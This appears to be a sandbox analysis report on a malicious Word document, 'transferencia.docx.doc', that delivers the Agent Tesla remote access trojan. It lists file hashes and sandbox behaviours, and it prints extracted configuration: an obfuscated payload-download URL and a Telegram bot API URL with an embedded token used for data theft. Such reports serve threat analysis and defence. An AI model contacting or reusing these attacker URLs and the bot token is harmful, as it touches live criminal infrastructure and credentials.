General
-
Target
transferencia.docx.doc
-
Size
10KB
-
Sample
230222-prryzsbd26
-
MD5
b71a4eadd0fa49510df132d011f6d736
-
SHA1
90b2734bd8f080838d401a25ed3fddec066b5c5f
-
SHA256
63d81262d8b022c5c67b24e394a32037bc0cf41869444152c48ee204d84386a3
-
SHA512
8d3c0dd8c30cabb702f012753966022bb7fb0745469c979c5f542d2c9daf0d95cbb7752fb7f3458054a4a44446dedf685e72e99bc5a6a1373561134261a56672
-
SSDEEP
192:ScIMmtP0xfUW70vG/b3kgOi4O7+us+1pReDnc378Vx6T:SPX+si10ni4O78yeDnM4VsT
Static task
static1
Behavioral task
behavioral1
Sample
transferencia.docx
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
transferencia.docx
Resource
win10v2004-20230220-en
Malware Config
Extracted
http://qquuuq9werqwqqqq00qwewerSASWERWRWIERIWERIEWIR00R0WEQQQ1QQQ99WER8W9ER9WERWKRJEWKRKWERK@3323444111/O-O-OOO.DOC
Extracted
agenttesla
https://api.telegram.org/bot5851500456:AAGR5SiDXSkn8lCoZA-eArnoTA9CuFr-jC0/
Targets
-
-
Target
transferencia.docx.doc
-
Size
10KB
-
MD5
b71a4eadd0fa49510df132d011f6d736
-
SHA1
90b2734bd8f080838d401a25ed3fddec066b5c5f
-
SHA256
63d81262d8b022c5c67b24e394a32037bc0cf41869444152c48ee204d84386a3
-
SHA512
8d3c0dd8c30cabb702f012753966022bb7fb0745469c979c5f542d2c9daf0d95cbb7752fb7f3458054a4a44446dedf685e72e99bc5a6a1373561134261a56672
-
SSDEEP
192:ScIMmtP0xfUW70vG/b3kgOi4O7+us+1pReDnc378Vx6T:SPX+si10ni4O78yeDnM4VsT
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Accesses Microsoft Outlook profiles
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory
-
Suspicious use of SetThreadContext
-